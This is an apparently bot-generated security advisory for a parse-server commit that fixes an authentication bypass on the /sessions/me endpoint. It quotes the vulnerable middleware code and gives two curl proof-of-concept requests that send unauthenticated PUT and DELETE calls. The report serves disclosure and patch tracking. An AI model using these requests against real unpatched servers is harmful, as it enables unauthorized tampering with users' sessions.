[Vulnerability] parse-community/parse-server: Authentication Bypass

[github-actions]

Potential Security Vulnerability Detected

Repository: parse-community/parse-server
Commit: 2a9fdab
Author: Manuel
Date: 2026-03-15T18:51:40Z

Commit Message

fix: Validate session in middleware for non-GET requests to `/sessions/me` (#10213)

Pull Request

PR: #10213 - fix: Validate session in middleware for non-GET requests to /sessions/me
Labels: state:released-alpha

Description:

Issue

Validate session in middleware for non-GET requests to /sessions/me

Analysis

Vulnerability Type: Authentication Bypass
Severity: High

Description

Before the patch, non-GET requests to the /sessions/me endpoint bypassed session validation, allowing attackers to perform PUT or DELETE operations without a valid session token. The patch enforces session validation in middleware for these requests, preventing unauthorized session modifications or deletions.

Affected Code

export const handleParseSession = async (req, res, next) => {
  try {
    const info = req.info;
    if (req.auth || req.url === '/sessions/me') {
      next();
      return;
    }

Proof of Concept

curl -X PUT http://localhost:8378/1/sessions/me -H "X-Parse-Application-Id: test" -H "X-Parse-REST-API-Key: rest" -d '{}' # Assuming no session token provided, this request would succeed before patch, allowing unauthorized session update

curl -X DELETE http://localhost:8378/1/sessions/me -H "X-Parse-Application-Id: test" -H "X-Parse-REST-API-Key: rest" # Without session token, this request would succeed before patch, allowing unauthorized session deletion

---

This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-16T00:00:54.875Z